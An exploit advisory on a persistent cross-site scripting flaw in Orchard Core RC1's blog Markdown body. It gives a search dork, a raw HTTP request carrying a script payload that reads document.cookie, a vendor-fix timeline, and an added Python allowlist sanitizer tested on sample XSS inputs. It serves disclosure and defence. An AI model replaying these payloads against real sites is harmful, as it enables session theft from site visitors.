# Exploit Title: Orchard Core RC1 - Persistent Cross-Site Scripting
# Google Dork: "Orchardcms"
# Date: 2020-05-07
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Vendor Homepage: http://www.orchardcore.net/
# Software Link: https://github.com/OrchardCMS/OrchardCore
# Version: RC1
# Tested on: Windows
# CVE : N/A

### Vulnerability : Persistent Cross-Site Scripting

### Describe the bug

Persistent cross-site scripting (stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML when creating or editing blog content. The payload is submitted in the Markdown body field of a blog post (MarkdownBodyPart.Source) and is rendered back to every user who views the post.

### To Reproduce

Steps to reproduce the behavior:

POST /Admin/Contents/ContentTypes/BlogPost/Create HTTP/1.1

-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="ListPart.ContainerId"

4s5x3fv3qpsh7rwzvy069ykbxn
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="TitlePart.Title"

Test XSS
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="AutoroutePart.Path"

-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="BlogPost.Subtitle.Text"

-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="MarkdownBodyPart.Source"

<script>alert(document.cookie)</script>
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="submit.Publish"

submit.Publish
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="__RequestVerificationToken"

xxx
-----------------------------31063090348194141451329743365--

### Reference:

https://github.com/OrchardCMS/OrchardCore/issues/5802

### History
=============
2020-03-23 Issue discovered
2020-03-27 Vendor contacted
2020-04-22 Vendor response and hotfix
2020-04-22 Vendor set patch milestone to rc2
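The root cause described above is a Markdown body whose raw HTML is passed through to the rendered page without sanitization. The following is an added example, not code from Orchard Core, its hotfix, or the advisory's author, of the defender-side control a CMS should apply: an allowlist HTML sanitizer (Python standard library only) run over the rendered Markdown before it is stored or served. The tag and attribute policy is a hypothetical one chosen for this example; the sample inputs, including the advisory's `<script>` payload, are constructed here.

```python
"""Added example (not Orchard Core's code): allowlist HTML sanitizer of the kind
a CMS should apply to rendered Markdown so that a raw <script> block typed into a
body field cannot reach other users' browsers."""
from html import escape
from html.parser import HTMLParser

# Hypothetical policy chosen for this example: tags a blog body may keep, and
# the attributes each of them may carry. Everything else is dropped or escaped.
ALLOWED_TAGS = {
    "p", "br", "b", "strong", "i", "em", "code", "pre", "ul", "ol", "li",
    "h1", "h2", "h3", "blockquote", "a",
}
ALLOWED_ATTRS = {"a": {"href", "title"}}
# Elements whose text content must be discarded too, not just the tag itself.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "/", "#")


def _safe_url(value: str) -> bool:
    """Accept only navigational URLs; rejects javascript:, data:, vbscript:, etc."""
    v = value.strip().lower().replace("\x00", "")
    return v.startswith(SAFE_URL_PREFIXES)


class _Sanitizer(HTMLParser):
    """Re-emits only allowlisted markup; all text is re-escaped on output."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0  # > 0 while inside a DROP_CONTENT_TAGS element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag, keep its text (handled in handle_data)
        kept = []
        for name, value in attrs:
            if name.startswith("on"):
                continue  # event-handler attributes are never allowed
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not _safe_url(value or ""):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> and friends

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in ALLOWED_TAGS or tag == "br":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments are dropped; they can smuggle conditional markup


def sanitize_html(fragment: str) -> str:
    """Return `fragment` keeping only allowlisted tags and attributes.

    Apply to the HTML produced by the Markdown renderer, because Markdown
    passes raw HTML blocks through untouched."""
    parser = _Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed samples: the advisory's payload plus common bypass shapes.
    for sample in (
        "<script>alert(document.cookie)</script>",
        '<p onclick="x">Hello <b>world</b></p>',
        '<a href="javascript:alert(1)">click</a>',
        "<img src=x onerror=alert(1)>",
    ):
        print(repr(sample), "->", repr(sanitize_html(sample)))
```

The sanitizer runs on the renderer's output rather than on the Markdown source, since a source-level filter would have to understand every way Markdown can emit HTML; a separate, simpler escaping path should still be used for plain-text fields such as the title.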